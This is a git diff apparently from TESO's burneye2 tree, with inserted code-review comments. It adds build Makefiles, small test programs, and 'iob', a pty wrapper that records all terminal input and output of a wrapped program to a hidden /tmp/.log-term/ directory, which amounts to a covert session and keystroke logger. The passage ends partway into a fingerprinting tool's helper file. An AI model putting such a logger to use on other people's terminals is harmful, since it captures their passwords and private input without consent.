19 ld -o 7350854-dietlibc 7350854-final-dietlibc.o
20 ld -o 7350854-glibc 7350854-final-glibc.o
21
227350854-final-dietlibc.o: 7350854.c
23 $(CC) $(CFLAGS) -c -o 7350854.o 7350854.c
24 ld -r -d -o 7350854-final-dietlibc.o 7350854.o $(LIBS_DIET)
25
267350854-final-glibc.o: 7350854.c
27 $(CC) $(CFLAGS) -c -o 7350854.o 7350854.c
28 ld -r -d -o 7350854-final-glibc.o 7350854.o $(LIBS_GLIBC)
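Review bot: The binaries added beside this Makefile cannot be reproduced from it on another host, because `LIBS_DIET` and `LIBS_GLIBC` hard-code `/usr/lib/diet/lib-i386` and `/usr/lib/gcc-lib/i386-linux/2.95.4`, and nothing records which toolchain produced the committed `.o` and linked files. I would lift the paths into overridable variables, e.g. `DIETLIB ?= /usr/lib/diet/lib-i386` and `GCCLIB ?= /usr/lib/gcc-lib/i386-linux/2.95.4`, and keep build outputs out of the tree so that what is run is what was built from the reviewed source. Both `-final-*.o` rules also write the same intermediate `7350854.o`, so a parallel `make` can race on it. The iob/Makefile in this commit has the same hard-coded paths and shared intermediates.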
diff --git a/other/burneye2/tmp/854/obj-dietstart/start.o b/other/burneye2/tmp/854/obj-dietstart/start.o
new file mode 100644
index 0000000..2e10da1
--- /dev/null
+++ b/other/burneye2/tmp/854/obj-dietstart/start.o
Binary files differ
diff --git a/other/burneye2/tmp/ed-final-dietlibc.o b/other/burneye2/tmp/ed-final-dietlibc.o
new file mode 100644
index 0000000..a1dc458
--- /dev/null
+++ b/other/burneye2/tmp/ed-final-dietlibc.o
Binary files differ
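diff --git a/other/burneye2/tmp/exectest/simple.c b/other/burneye2/tmp/exectest/simple.c
new file mode 100644
index 0000000..6d8b8a6
--- /dev/null
+++ b/other/burneye2/tmp/exectest/simple.c
@@ -0,0 +1,35 @@
+
+int
+_start (void)
+{
+ int a;
+
+ a = 6;
+ a = fac (a);
+ a = fac2 (6);
+
+ return (a);
+}
+
+
+int
+fac (int n)
+{
+ if (n <= 1)
+ return (1);
+ else
+ return (n * fac (n - 1));
+}
+
+
+int
+fac2 (int n)
+{
+ unsigned int a = n;
+
+ while (n > 1)
+ a *= --n;
+}
+
+
+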
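Review bot: `fac2` falls off its closing brace without a `return`, so the value that `_start` assigns from `fac2 (6)` and then returns is indeterminate; add `return (a);` after the loop. `fac` and `fac2` are also called in `_start` before any declaration is visible, which relies on implicit function declarations; prototypes `int fac (int n);` and `int fac2 (int n);` at the top of the file would fix that. If the missing return is deliberate for this exec test, a comment saying so would help the next reader.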
diff --git a/other/burneye2/tmp/exectest/simple.o b/other/burneye2/tmp/exectest/simple.o
new file mode 100644
index 0000000..76a6efa
--- /dev/null
+++ b/other/burneye2/tmp/exectest/simple.o
Binary files differ
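diff --git a/other/burneye2/tmp/funcptr/fptr.c b/other/burneye2/tmp/funcptr/fptr.c
new file mode 100644
index 0000000..291656b
--- /dev/null
+++ b/other/burneye2/tmp/funcptr/fptr.c
@@ -0,0 +1,24 @@
+
+int m2 (int a);
+
+typedef int (* fptr)(int);
+
+
+int
+main (int argc, char *argv[])
+{
+ fptr subfunc;
+
+
+ subfunc = m2;
+ return (subfunc (argc));
+}
+
+
+int
+m2 (int a)
+{
+ return (a << 1);
+}
+
+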
diff --git a/other/burneye2/tmp/funcptr/fptr.o b/other/burneye2/tmp/funcptr/fptr.o
new file mode 100644
index 0000000..a68a727
--- /dev/null
+++ b/other/burneye2/tmp/funcptr/fptr.o
Binary files differ
diff --git a/other/burneye2/tmp/iob/Makefile b/other/burneye2/tmp/iob/Makefile
new file mode 100644
index 0000000..d61da85
--- /dev/null
+++ b/other/burneye2/tmp/iob/Makefile
@@ -0,0 +1,32 @@
1
2CC=gcc
3CFLAGS=-Os -nostdlib
4
5# 1. order of start.o important, -L/-l does not matter
6LIBS_DIET=/usr/lib/diet/lib-i386/start.o \
7 -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
8INCLUDE_DIET=-I/usr/include/diet
9
10# gcc --help -v 2>&1 |grep crt
11LIBS_GLIBC=/usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-linux/2.95.4/crtbegin.o \
12 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc \
13 /usr/lib/gcc-lib/i386-linux/2.95.4/crtend.o /usr/lib/crtn.o
14
15all: iob
16
17clean:
18 rm -f *.o iob-glibc iob-dietlibc
19
20iob: iob-final-dietlibc.o iob-final-glibc.o
21 ld -o iob-dietlibc iob-final-dietlibc.o
22 ld -o iob-glibc iob-final-glibc.o
23
24iob-final-dietlibc.o: iob.c
25 $(CC) $(INCLUDE_DIET) $(CFLAGS) -c -o iob.o iob.c
26 $(CC) $(INCLUDE_DIET) $(CFLAGS) -c -o pty.o pty.c
27 ld -r -d -o iob-final-dietlibc.o iob.o pty.o $(LIBS_DIET)
28
29iob-final-glibc.o: iob.c
30 $(CC) $(CFLAGS) -c -o iob.o iob.c
31 $(CC) $(CFLAGS) -c -o pty.o pty.c
32 ld -r -d -o iob-final-glibc.o iob.o pty.o $(LIBS_GLIBC)
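Review bot: Both `iob-final-*.o` rules list only `iob.c` as a prerequisite although their recipes also compile `pty.c`, so an edit to `pty.c` (or to `pty.h`, which the diffstat lists and which is presumably included by it) does not trigger a rebuild. `iob-final-dietlibc.o: iob.c pty.c pty.h`, and the same for the glibc rule, would fix that. Because the dietlibc rule compiles with `$(INCLUDE_DIET)` and the glibc rule does not, while both write `iob.o` and `pty.o`, the objects should also get per-variant names so that one variant is never linked from objects built against the other's headers.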
diff --git a/other/burneye2/tmp/iob/iob b/other/burneye2/tmp/iob/iob
new file mode 100644
index 0000000..6ee0987
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob-dietlibc b/other/burneye2/tmp/iob/iob-dietlibc
new file mode 100644
index 0000000..4656837
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob-dietlibc
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob-final-dietlibc.o b/other/burneye2/tmp/iob/iob-final-dietlibc.o
new file mode 100644
index 0000000..269120b
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob-final-glibc.o b/other/burneye2/tmp/iob/iob-final-glibc.o
new file mode 100644
index 0000000..4fa744b
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob-final-glibc.o
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob-glibc b/other/burneye2/tmp/iob/iob-glibc
new file mode 100644
index 0000000..e5db4c9
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob-glibc
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob.c b/other/burneye2/tmp/iob/iob.c
new file mode 100644
index 0000000..5cd7f8c
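--- /dev/null
+++ b/other/burneye2/tmp/iob/iob.c
@@ -0,0 +1,303 @@
+/* iob - i/o bridge
+ *
+ * (C) COPYRIGHT TESO Security, 2001
+ * All Rights Reserved
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright notice,
+ * this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright notice,
+ * this list of conditions and the following disclaimer in the documentation
+ * and/or other materials provided with the distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this software
+ * must display the following acknowledgement:
+ *
+ * This product includes software developed by TESO Security.
+ *
+ * 4. The name of TESO Security may not be used to endorse or promote products
+ * derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY TESO ``AS IS'' AND ANY EXPRESS OR IMPLIED
+ * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
+ * EVENT SHALL TESO SECURITY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
+ * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
+ * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+ * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
+ * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
+ * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ *
+ *****************************************************************************
+ * by scut 2001/10
+ */
+
+/* mod here */
+#define DEFAULT_LOG "/tmp/.log-term/"
+
+/* do not modify from here on
+ */
+#define VERSION "0.1"
+
+#include <sys/types.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <termios.h>
+#include <string.h>
+#include <time.h>
+
+#ifndef TIOCGWINSZ
+#include <sys/ioctl.h>
+#endif
+#include "pty.h"
+
+
+/* logging related data
+ */
+int log_in = 1; /* log input flag */
+int log_out = 1; /* log output flag */
+char * log_dir = DEFAULT_LOG; /* default log directory */
+
+FILE * log_fi = NULL;
+FILE * log_fo = NULL;
+
+char log_outn[256],
+ log_inn[256];
+
+
+static volatile sig_atomic_t sigcaught = 0;
+int ts_fd_save;
+struct termios ts_saved; /* before going to raw */
+int brute_output_fd = 0;
+
+
+void usage (char *progname);
+void tty_atexit (void);
+static void t_loop (int ptym);
+
+
+void
+usage (char *progname)
+{
+ fprintf (stderr, "iob - version "VERSION"\n\n");
+ fprintf (stderr, "usage: %s [-h] [-d dir] [-i <0|1>] [-o <0|1>] <argv>\n\n"
+ "-h\t\tprint this help\n"
+ "-d <dir>\tlog to 'dir' directory (default: " DEFAULT_LOG ")\n"
+ "-i <0|1>\tlog input data (default: true, 1)\n"
+ "-o <0|1>\tlog output data (default: true, 1)\n\n",
+ progname);
+
+ exit (EXIT_SUCCESS);
+}
+
+
+int
+main (int argc, char *argv[])
+{
+ char c;
+ char ** n_argv;
+ int interactive, /* != 0 if we are at a tty */
+ fdm; /* pty master fd */
+
+ time_t tnow;
+ struct tm * tm_now;
+
+ pid_t mpid; /* pid used for forking */
+ char slave_name[20]; /* name of slave pty file */
+ char log_time[64];
+
+ /* original terminal properties in case we are already bound to
+ * a tty
+ */
+ struct termios ts_orig;
+ struct termios * ts_init = NULL;
+ struct winsize ws_orig;
+ struct winsize * ws_init = NULL;
+
+
+ while ((c = getopt (argc, argv, "hd:i:o:")) != EOF) {
+ switch (c) {
+ case 'h':
+ usage (argv[0]);
+ break;
+ case 'd':
+ if (strlen (optarg) == 0)
+ exit (EXIT_FAILURE);
+
+ log_dir = malloc (strlen (optarg) + 2);
+ strcpy (log_dir, optarg);
+
+ if (log_dir[strlen (log_dir) - 1] != '/')
+ strcat (log_dir, "/");
+ break;
+ case 'i':
+ log_in = (optarg[0] == '1') ? 1 : 0;
+ break;
+ case 'o':
+ log_out = (optarg[0] == '1') ? 1 : 0;
+ break;
+ default:
+ exit (EXIT_FAILURE);
+ break;
+ }
+ }
+
+ n_argv = &argv[optind];
+ if (n_argv[0] == NULL)
+ usage (argv[0]);
+
+ if (n_argv[0] == argv[0] || strlen (n_argv[0]) == 0)
+ exit (EXIT_SUCCESS);
+
+ /* get time and open logfiles
+ */
+ time (&tnow);
+ tm_now = localtime (&tnow);
+ snprintf (log_time, sizeof (log_time),
+ "%04d%02d%02d_%02d%02d_%05d_%s",
+ tm_now->tm_year + 1900, tm_now->tm_mon + 1, tm_now->tm_mday,
+ tm_now->tm_hour, tm_now->tm_min,
+ getpid (),
+ strrchr (n_argv[0], '/') == NULL ? n_argv[0] :
+ strrchr (n_argv[0], '/') + 1);
+
+ snprintf (log_inn, sizeof (log_inn), "%s%s.in", log_dir, log_time);
+ snprintf (log_outn, sizeof (log_outn), "%s%s.out", log_dir, log_time);
+
+
+ /* find out whether the current terminal is driven by another tty
+ * and in case it is, fetch the appropiate structures to pass to
+ * pty_fork
+ */
+ interactive = isatty (STDIN_FILENO);
+
+ if (interactive != 0) {
+ if (tcgetattr (STDIN_FILENO, &ts_orig) < 0)
+ exit (EXIT_FAILURE);
+
+ ts_init = &ts_orig;
+
+ if (ioctl (STDIN_FILENO, TIOCGWINSZ, (char *) &ws_orig) < 0)
+ exit (EXIT_FAILURE);
+
+ ws_init = &ws_orig;
+ }
+
+ mpid = pty_fork (&fdm, slave_name, ts_init, ws_init);
+ if (mpid < 0)
+ exit (EXIT_FAILURE);
+
+ /* in case we're a the child process, we execute a program
+ */
+ if (mpid == 0) {
+ execvp (n_argv[0], n_argv);
+
+ /* an error occured
+ */
+ exit (EXIT_FAILURE);
+ }
+
+ if (interactive != 0) {
+ ts_fd_save = STDIN_FILENO;
+ if (tty_raw (STDIN_FILENO, &ts_saved) < 0)
+ exit (EXIT_FAILURE);
+
+ /* install atexit cleanup handler
+ */
+ if (atexit (tty_atexit) < 0)
+ exit (EXIT_FAILURE);
+ }
+
+ t_loop (fdm);
+
+ exit (EXIT_SUCCESS);
+}
+
+
+void
+tty_atexit (void)
+{
+ tcsetattr (ts_fd_save, TCSAFLUSH, &ts_saved);
+
+ return;
+}
+
+
+static void
+t_loop (int ptym)
+{
+ pid_t child;
+ int nread;
+ char buff[512];
+ FILE * log_fo;
+
+
+ child = fork ();
+ if (child < 0)
+ exit (EXIT_FAILURE);
+
+ log_fi = log_fo = NULL;
+
+ if (child == 0) {
+ if (log_in) {
+ log_fi = fopen (log_inn, "wb");
+ if (log_fi == NULL)
+ exit (EXIT_FAILURE);
+ }
+
+ /* child loop
+ */
+ for ( ; ; ) {
+ nread = read (STDIN_FILENO, buff, sizeof (buff));
+ if (nread < 0)
+ exit (EXIT_FAILURE);
+
+ if (nread == 0)
+ break;
+
+ if (write (ptym, buff, nread) != nread)
+ exit (EXIT_FAILURE);
+
+ if (log_fi != NULL) {
+ fwrite (buff, nread, 1, log_fi);
+ fflush (log_fi);
+ }
+ }
+ }
+
+ if (log_out) {
+ log_fo = fopen (log_outn, "wb");
+ if (log_fo == NULL)
+ exit (EXIT_FAILURE);
+ }
+
+ /* parent loop
+ */
+ for ( ; ; ) {
+
+ nread = read (ptym, buff, sizeof (buff));
+ if (nread <= 0)
+ break;
+
+ if (write (STDOUT_FILENO, buff, nread) != nread)
+ exit (EXIT_FAILURE);
+
+ if (log_fo != NULL) {
+ fwrite (buff, nread, 1, log_fo);
+ fflush (log_fo);
+ }
+ }
+
+ if (sigcaught == 0)
+ kill (child, SIGTERM);
+
+ return;
+}
+
+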
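Review bot: In t_loop the stdin-forwarding child has no exit after its `for` loop, so when read() returns 0 it breaks out and falls through into the parent's code. There it reopens log_outn with "wb" (truncating what the parent has written), competes with the parent for reads on ptym, and finally reaches `kill (child, SIGTERM)` with child == 0, which signals the whole process group. Adding `exit (EXIT_SUCCESS);` after the child's loop, still inside `if (child == 0)`, closes that path. Separately, log_inn and log_outn are predictable names under the /tmp default and are created with plain fopen(), which follows symlinks and takes its mode from the umask even though the files hold raw terminal input; creating them with `open (log_inn, O_WRONLY | O_CREAT | O_EXCL, 0600)` and fdopen() would avoid both.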
diff --git a/other/burneye2/tmp/iob/iob.o b/other/burneye2/tmp/iob/iob.o
new file mode 100644
index 0000000..232d43f
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob.o
Binary files differ
diff --git a/other/burneye2/tmp/iob/pty.c b/other/burneye2/tmp/iob/pty.c
new file mode 100644
index 0000000..a2afa95
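--- /dev/null
+++ b/other/burneye2/tmp/iob/pty.c
@@ -0,0 +1,315 @@
+/* iob - i/o bridge
+ *
+ * by scut, based mostly of r. stevens masterpiece apue with some twirks
+ *
+ * pseudo tty handler
+ */
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <grp.h>
+#include <termios.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#ifndef TIOCGWINSZ
+#include <sys/ioctl.h>
+#endif
+#ifdef SYS_V_RELEASE_4
+#include <stropts.h>
+#endif
+#include <unistd.h>
+
+
+#ifdef SYS_V_RELEASE_4
+
+extern char *ptsname (int); /* prototype not in any system header */
+
+int
+pty_m_open (char *pts_name)
+{
+ char *ptr;
+ int fdm;
+
+ strcpy (pts_name, "/dev/ptmx");
+ fdm = open (pts_name, O_RDWR);
+ if (fdm < 0)
+ return (-1);
+
+ if (grantpt (fdm) < 0) {
+ close (fdm);
+ return (-2);
+ }
+
+ if (unlockpt (fdm) < 0) {
+ close (fdm);
+ return (-3);
+ }
+
+ ptr = ptsname (fdm);
+ if (ptr == NULL) {
+ close (fdm);
+ return (-4);
+ }
+
+ strcpy (pts_name, ptr);
+
+ return (fdm);
+}
+
+
+int
+pty_s_open (int fdm, char *pts_name)
+{
+ int fds;
+
+ fds = open (pts_name, O_RDWR);
+ if (fds < 0) {
+ close (fdm);
+ return (-5);
+ }
+
+ if (ioctl (fds, I_PUSH, "ptem") < 0) {
+ close (fdm);
+ close (fds);
+ return (-6);
+ }
+
+ if (ioctl (fds, I_PUSH, "ldterm") < 0) {
+ close (fdm);
+ close (fds);
+ return (-7);
+ }
+
+ if (ioctl (fds, I_PUSH, "ttcompat") < 0) {
+ close (fdm);
+ close (fds);
+ return (-8);
+ }
+
+ return (fds);
+}
+
+#else
+
+
+int
+pty_m_open (char *pts_name)
+{
+ int fdm;
+ char *ptr1,
+ *ptr2;
+
+ strcpy (pts_name, "/dev/ptyXY");
+ for (ptr1 = "pqrstuvwxyzPQRST" ; *ptr1 != 0 ; ++ptr1) {
+ pts_name[8] = *ptr1;
+
+ for (ptr2 = "0123456789abcdef" ; *ptr2 != 0 ; ++ptr2) {
+ pts_name[9] = *ptr2;
+ fdm = open (pts_name, O_RDWR);
+ if (fdm < 0) {
+ if (errno == ENOENT)
+ return (-1);
+ else
+ continue;
+ }
+
+ pts_name[5] = 't';
+
+ return (fdm);
+ }
+ }
+
+ return (-1);
+}
+
+
+int
+pty_s_open (int fdm, char *pts_name)
+{
+ struct group *grp_ptr;
+ int gid,
+ fds;
+
+ grp_ptr = getgrnam ("tty");
+ if (grp_ptr != NULL)
+ gid = grp_ptr->gr_gid;
+ else
+ gid = -1;
+
+ chown (pts_name, getuid (), gid);
+ chmod (pts_name, S_IRUSR | S_IWUSR | S_IWGRP);
+
+ fds = open (pts_name, O_RDWR);
+ if (fds < 0) {
+ close (fdm);
+
+ return (-1);
+ }
+
+ return (fds);
+}
+
+#endif
+
+
+/* pty_fork
+ *
+ */
+
+pid_t
+pty_fork (int *fd_master_ptr, char *slave_name,
+ const struct termios *slave_termios,
+ const struct winsize *slave_winsize)
+{
+ int fdm,
+ fds;
+ pid_t pid;
+ char pts_name[20];
+
+ fdm = pty_m_open (pts_name);
+ if (fdm < 0) {
+ exit (EXIT_FAILURE);
+ }
+
+ if (slave_name != NULL)
+ strcpy (slave_name, pts_name);
+
+ pid = fork ();
+ if (pid < 0)
+ return (-1);
+
+ if (pid == 0) {
+ if (setsid () < 0)
+ exit (EXIT_FAILURE);
+ fds = pty_s_open (fdm, pts_name);
+ if (fds < 0)
+ exit (EXIT_FAILURE);
+ close (fdm);
+
+#if defined(TIOCSCTTY) && !defined(CIBAUD)
+ if (ioctl (fds, TIOCSCTTY, (char *) 0) < 0)
+ exit (EXIT_FAILURE);
+#endif
+ if (slave_termios != NULL) {
+ if (tcsetattr (fds, TCSANOW, slave_termios) < 0)
+ exit (EXIT_FAILURE);
+ }
+ if (slave_winsize != NULL) {
+ if (ioctl (fds, TIOCSWINSZ, slave_winsize) < 0)
+ exit (EXIT_FAILURE);
+ }
+
+ if (dup2 (fds, STDIN_FILENO) != STDIN_FILENO ||
+ dup2 (fds, STDOUT_FILENO) != STDOUT_FILENO ||
+ dup2 (fds, STDERR_FILENO) != STDERR_FILENO)
+ {
+ exit (EXIT_FAILURE);
+ }
+ if (fds > STDERR_FILENO)
+ close (fds);
+
+ return (0); /* just like fork (), child */
+ } else {
+ *fd_master_ptr = fdm;
+
+ return (pid);
+ }
+}
+
+
+void
+set_noecho (int fd)
+{
+ struct termios stermios;
+
+ if (tcgetattr (fd, &stermios) < 0)
+ exit (EXIT_FAILURE);
+
+ stermios.c_lflag &= ~(ECHO | ECHOE | ECHOK | ECHONL);
+ stermios.c_oflag &= ~(ONLCR);
+
+ if (tcsetattr (fd, TCSANOW, &stermios) < 0)
+ exit (EXIT_FAILURE);
+
+ return;
+}
+
+
+int
+tty_raw (int fd, struct termios *sios)
+{
+ struct termios tios;
+
+
+ if (sios != NULL && tcgetattr (fd, sios) < 0)
+ return (-1);
+
+ /* saved old termios structure, now copy it to work with it
+ */
+ memcpy (&tios, sios, sizeof (struct termios));
+
+ tios.c_lflag &= ~(ECHO | ICANON | IEXTEN | ISIG);
+ tios.c_iflag &= ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON);
+ tios.c_cflag &= ~(CSIZE | PARENB);
+ tios.c_cflag |= CS8;
+ tios.c_oflag &= ~(OPOST);
+ tios.c_cc[VMIN] = 1;
+ tios.c_cc[VTIME] = 0;
+
+ if (tcsetattr (fd, TCSAFLUSH, &tios) < 0)
+ return (-1);
+
+ return (0);
+}
+
+
+int
+pty_setup (void (* handler)(void *), void *data)
+{
+ int interactive,
+ fdm;
+ pid_t mpid;
+
+ char slave_name[20];
+ struct termios ts_orig;
+ struct termios * ts_init = NULL;
+ struct winsize ws_orig;
+ struct winsize * ws_init = NULL;
+
+
+ interactive = isatty (STDIN_FILENO);
+ if (interactive != 0) {
+ if (tcgetattr (STDIN_FILENO, &ts_orig) < 0)
+ exit (EXIT_FAILURE);
+
+ ts_init = &ts_orig;
+
+ if (ioctl (STDIN_FILENO, TIOCGWINSZ, (char *) &ws_orig) < 0)
+ exit (EXIT_FAILURE);
+
+ ws_init = &ws_orig;
+ }
+
+ mpid = pty_fork (&fdm, slave_name, ts_init, ws_init);
+ if (mpid < 0)
+ exit (EXIT_FAILURE);
+
+ /* child calls handler
+ */
+ if (mpid == 0) {
+ handler (data);
+
+ /* handler shouldn't return
+ */
+ printf ("pty handler returned, failure\n");
+ exit (EXIT_FAILURE);
+ }
+
+ /* parent just returns master filedescriptor
+ */
+ return (fdm);
+}
+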
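Review bot: tty_raw dereferences `sios` even when it is NULL: the tcgetattr() call is skipped for a NULL pointer, but the following `memcpy (&tios, sios, sizeof (struct termios))` still reads through it, although pty.h documents NULL as allowed. Reading the current state into the local first avoids this: `if (tcgetattr (fd, &tios) < 0) return (-1);` followed by `if (sios != NULL) *sios = tios;`. In the SYS_V_RELEASE_4 branch of pty_m_open, `strcpy (pts_name, ptr)` copies the ptsname() result into a buffer that pty_fork sizes at 20 bytes with no length check; a bounded copy that fails on truncation would be safer. The chown() and chmod() results in the other pty_s_open are also ignored, so a slave device left with its previous owner or mode goes unnoticed.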
diff --git a/other/burneye2/tmp/iob/pty.h b/other/burneye2/tmp/iob/pty.h
new file mode 100644
index 0000000..864965d
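--- /dev/null
+++ b/other/burneye2/tmp/iob/pty.h
@@ -0,0 +1,95 @@
+/* brutate
+ *
+ * scut / team teso
+ *
+ * pseudo tty handler include file
+ */
+
+#ifndef BR_PTY_H
+#define BR_PTY_H
+
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <termios.h>
+
+
+/* pty_m_open
+ *
+ * open master pty and return actual file used in `pts_name', which has
+ * to point to allocated memory and must be at least 20 bytes long.
+ *
+ * return master pty filedescriptor in case of success
+ * return negative error number in case of failure
+ */
+
+int pty_m_open (char *pts_name);
+
+
+/* pty_s_open
+ *
+ * open slave pty with filename pointed to by `pts_name' and bind it to
+ * master pty with descriptor `fdm'.
+ *
+ * return slave pty filedescriptor in case of success
+ * return negative error number in case of failure
+ */
+
+int pty_s_open (int fdm, char *pts_name);
+
+
+/* pty_fork
+ *
+ * fork a child process and create a pty binding between this parent process
+ * (master pty) and the child process (slave pty). return the master pty
+ * filedescriptor through `fd_master_ptr'. `slave_name' may be NULL or contain
+ * a pointer to allocated memory where the slave pty name will be stored.
+ * `slave_termios' may be NULL or contain a valid termios structure which will
+ * initialize the slave terminal line discipline. in case `slave_winsize' is
+ * not NULL it will initialize the slave pty window size.
+ *
+ * return values are the same as the ones of fork(2) (see "man 2 fork").
+ */
+
+pid_t pty_fork (int *fd_master_ptr, char *slave_name,
+ const struct termios *slave_termios,
+ const struct winsize *slave_winsize);
+
+
+/* set_noecho
+ *
+ * disable echo capability on terminal associated with filedescriptor `fd'
+ *
+ * return in any case
+ */
+
+void set_noecho (int fd);
+
+
+/* tty_raw
+ *
+ * put terminal associated with filedescriptor `fd' into raw mode, saving the
+ * current mode into the termios structure pointed to by `sios' in case it is
+ * non-NULL
+ *
+ * return 0 on success
+ * return -1 on failure
+ */
+
+int tty_raw (int fd, struct termios *sios);
+
+
+/* pty_setup
+ *
+ * helper routine, which allocates a pseudo terminal and tries to preserve
+ * as much settings as possible from the current terminal. then it forks
+ * away a child process in which nothing happens except that the handler
+ * function `handler' is called with `data' as parameter.
+ *
+ * returns the filedescriptor of the pty on success
+ * exits in case of failure
+ */
+
+int pty_setup (void (* handler)(void *), void *data);
+
+#endif
+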
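Review bot: The pty_fork comment gives no size for `slave_name`, while pty.c fills it with `strcpy (slave_name, pts_name)` from a 20-byte buffer; it should carry the same "at least 20 bytes long" requirement that the pty_m_open comment states. The "same as the ones of fork(2)" return description also leaves out that pty_fork calls exit() when pty_m_open fails, so a caller never sees -1 for that case. The set_noecho comment says "return in any case", but the implementation exits when tcgetattr() or tcsetattr() fails; the comment should say so.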
diff --git a/other/burneye2/tmp/iob/pty.o b/other/burneye2/tmp/iob/pty.o
new file mode 100644
index 0000000..ad3beec
--- /dev/null
+++ b/other/burneye2/tmp/iob/pty.o
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/Makefile b/other/burneye2/tmp/ldistfp/Makefile
new file mode 100644
index 0000000..10f0f3a
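--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/Makefile
@@ -0,0 +1,37 @@
+
+CC=gcc
+CFLAGS=-Os -nostdlib
+
+
+FILES=ldistfp.o common.o network.o
+
+# 1. order of start.o important, -L/-l does not matter
+LIBS_DIET=/usr/lib/diet/lib-i386/start.o \
+ -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
+DIET_INCLUDE=-I/usr/include/diet
+
+# gcc --help -v 2>&1 |grep crt
+LIBS_GLIBC=-lpthread /usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-linux/2.95.4/crtbegin.o \
+ -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc \
+ /usr/lib/gcc-lib/i386-linux/2.95.4/crtend.o /usr/lib/crtn.o
+
+all: ldistfp
+
+clean:
+ rm -f *.o ldistfp-glibc ldistfp-dietlibc
+
+ldistfp: ldistfp-final-dietlibc.o ldistfp-final-glibc.o
+ ld -o ldistfp-dietlibc ldistfp-final-dietlibc.o
+ ld -o ldistfp-glibc ldistfp-final-glibc.o
+
+ldistfp-final-dietlibc.o: $(FILES)
+ $(CC) $(DIET_INCLUDE) $(CFLAGS) -c -o ldistfp.o ldistfp.c
+ $(CC) $(DIET_INCLUDE) $(CFLAGS) -c -o network.o network.c
+ $(CC) $(DIET_INCLUDE) $(CFLAGS) -c -o common.o common.c
+ ld -r -d -o ldistfp-final-dietlibc.o $(FILES) $(LIBS_DIET)
+
+ldistfp-final-glibc.o: ldistfp.c
+ $(CC) $(CFLAGS) -c -o ldistfp.o ldistfp.c
+ $(CC) $(CFLAGS) -c -o network.o network.c
+ $(CC) $(CFLAGS) -c -o common.o common.c
+ ld -r -d -o ldistfp-final-glibc.o $(FILES) $(LIBS_GLIBC)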
diff --git a/other/burneye2/tmp/ldistfp/common.c b/other/burneye2/tmp/ldistfp/common.c
new file mode 100644
index 0000000..bae7ebc
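--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/common.c
@@ -0,0 +1,373 @@
+
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/time.h>
+#include <netinet/in.h>
+#include <unistd.h>
+#include <time.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include "common.h"
+
+
+#ifdef DEBUG
+void
+debugp (char *filename, const char *str, ...)
+{
+ FILE *fp; /* temporary file pointer */
+ va_list vl;
+
+ fp = fopen (filename, "a");
+ if (fp == NULL)
+ return;
+
+ va_start (vl, str);
+ vfprintf (fp, str, vl);
+ va_end (vl);
+
+ fclose (fp);
+
+ return;
+}
+
+void
+hexdump (char *filename, unsigned char *data, unsigned int amount)
+{
+ FILE *fp; /* temporary file pointer */
+ unsigned int dp, p; /* data pointer */
+ const char trans[] =
+ "................................ !\"#$%&'()*+,-./0123456789"
+ ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+ "nopqrstuvwxyz{|}~...................................."
+ "....................................................."
+ "........................................";
+
+ fp = fopen (filename, "a");
+ if (fp == NULL)
+ return;
+
+ fprintf (fp, "\n-packet-\n");
+
+ for (dp = 1; dp <= amount; dp++) {
+ fprintf (fp, "%02x ", data[dp-1]);
+ if ((dp % 8) == 0)
+ fprintf (fp, " ");
+ if ((dp % 16) == 0) {
+ fprintf (fp, "| ");
+ p = dp;
+ for (dp -= 16; dp < p; dp++)
+ fprintf (fp, "%c", trans[data[dp]]);
+ fflush (fp);
+ fprintf (fp, "\n");
+ }
+ fflush (fp);
+ }
+ if ((amount % 16) != 0) {
+ p = dp = 16 - (amount % 16);
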